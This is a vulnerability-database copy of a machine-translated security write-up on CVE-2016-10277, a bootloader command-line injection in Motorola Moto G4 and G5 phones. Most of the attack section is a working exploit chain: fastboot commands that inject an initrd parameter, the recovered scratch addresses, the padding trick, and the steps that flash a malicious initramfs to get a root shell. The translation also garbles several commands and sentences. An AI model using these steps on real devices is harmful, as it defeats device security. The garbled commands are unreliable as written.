Lucene search

K
myhack58佚名MYHACK58:62201787008
HistoryJun 13, 2017 - 12:00 a.m.

Motorola G4 & G5 mobile phone was traced to the presence of high-risk kernel command line injection vulnerability-vulnerability warning-the black bar safety net

2017-06-1300:00:00
佚名
www.myhack58.com
803

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.002 Low

EPSS

Percentile

55.0%

In a previous article about the Nexus6 root vulnerability in the article, we had mentioned Vulnerability CVE-2016-10277 will likely affect the Motorola device. When we on Twitter by some of the relevant reports after the fact to prove our previous conjecture.
In order to prove that Motorola devices in the presence of such a high-risk vulnerability, and we’ve got two Motorola phones, and then their system upgrade to the latest version:
1. MotoG4 athene XT1622, system version: NPJS25. 93-14. 4, Bootloader: the moto-msm8952-B1. 05; and
2. MotoG5 cedric XT1676, system version: NPP25. 137-33, the bootloader: the moto-msm8937-B8. 09; the
Recalling that article
1. The presence of vulnerability of the Motorola Android Bootloader(ABOOT will allow the attacker to implement kernel command line injection.
2. We can inject a man named“initrd”parameter, which will allow us to force the Linux kernel the initramfs is filled to the rootfs, and you can also specify a physical address.
3. We can use the ABOOT of the download function to our malicious initramfs is stored to a known physical address SCRATCH_ADDR Nexus 6 is 0×11000000 to.
4. An attacker can use this vulnerability to get to without restricted root shell.
Verify the Moto G4 & G5 on the vulnerability, CVE-2016-10277
Experiments show that both models of the device will indeed be affected by the vulnerability, and the vulnerability of use is also very simple. We just need to run the command fastboot oem config fsg-id “a androidboot. foo=bar”, you can directly create the ro. the boot. foo property: the
$fastboot oem config fsg-id “a androidboot. foo=bar”

(bootloader)
(bootloader)
(bootloader) androidboot. foo=bar
(bootloader)
(bootloader)
(bootloader) FSG IDs, see http://goo.gl/gPmhU
(bootloader)
(bootloader)
OKAY[ 0.013 s]

$fastboot continue
$ adbshell
cedric:/$ getprop is ro. the boot. foo
bar
cedric:/$
This also means that we have the parameters injected into the cedric the kernel command line. Next, we proved that we are able to control the initrd parameter, and it will allow us to force the Linux kernel from a specified physical address to load the initramfs for. We can by running the command fastboot oem config fsg-id "a initrd=0×12345678,1234"to let the kernel crash.
As mentioned before, in our use of the vulnerability to the G4 & G5 device for testing before, we also need to meet two special requirements:
1. Find the bootloader for the use of SCRATCH_ADDR value.
2. Create malicious initramfs documentation.
Find SCRATCH_ADDR value
In IDA load the athene of the ABOOT and cedric the ABOOT afterwards, we quickly got SCRATCH_ADDR value:
//athene
signedint target_get_scratch_address()
{
return 0x90000000;
}

//cedric
signedint target_get_scratch_address()
{
return 0xA0100000;
}
Verify SCRATCH_ADDR value
In we explain the malicious initramfs configuration method before, we need to verify SCRATCH_ADDR value of correctness, otherwise we get the results of the analysis are likely to have problems.
In order to verify this address is correct, we are from Motorola’s official firmware image to extract the original initramfs document, then make use of this vulnerability from the address SCRATCH_ADDR loaded the official initramfs is.

(bootloader)“fsg-id” type="str"protected=“false”>
(bootloader)
(bootloader) initrd=0x90000000,1766036
(bootloader) /value>
(bootloader)
(bootloader) FSG IDs, see http://goo.gl/gPmhU
(bootloader) /description>
(bootloader)UTAG>

OKAY[ 0.015 s]
finished. total time: 0.015 s

$fastboot flash the aleph initramfs.cpio.gz
targetreported max download size of 536870912 bytes
sending’aleph’ (1725 KB)…
OKAY[ 1.088 s]
writing’aleph’…
(bootloader)Invalid partition name aleph
FAILED(remote failure)
finished. total time: 1.095 s

$fastboot continue
At this time the file did not load properly, and the device then enters a infinite reboot, which let us very depressed.
Fill the Payload
We carried out a bold guess, eventually found, when we will the initramfs is loaded into the address SCRATCH_ADDR after, and in ABOOT to jump to the Linux kernel before cedric and athene’s ABOOT the some other not related data into the SCRATCH_ADDR, and led to our initramfs to crash, but not completely crash it.
Now, as long as we in the initramfs before filling some data, and then adjust accordingly initrd(SCRATCH_ADDR + sizeof(PADDING) to solve the crash problem. Therefore, if our hypothesis is correct, then we will be able to in the Linux kernel to really start running before you get the following memory data structure: the
! [](/Article/UploadPic/2017-6/2017613201642250. png? www. myhack58. com)
We filled a 32MB Data 0×2000000 and successful solution to the infinite restart problem.
Create Moto G4 & G5 initramfs and vulnerability PoC
For before Nexus 6 case, in order to create a initramfs and through adb to get to without a limited root shell, we’ve compiled an AOSP userdebug mirror. The reason we do this is because of the userdebug mirror is possible through su access SELinux domain, and adbd could give me some System Properties.
After the update of the PoC can be in our GitHub code repository. 【PoC transfer gate】
Understand the above content and run our PoC, we will be able to successfully get to the root shell.
MotoG4:
$fastboot oem config fsg-id “a initrd=0x92000000,1774281”
$fastboot flash the aleph initroot-athene.cpio.gz
$fastboot continue

$ adbshell
athene:/# id
uid=0(root)gid=0(root)groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc)context=u:r:kernel:s0

[1] [2] next

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.002 Low

EPSS

Percentile

55.0%

Related for MYHACK58:62201787008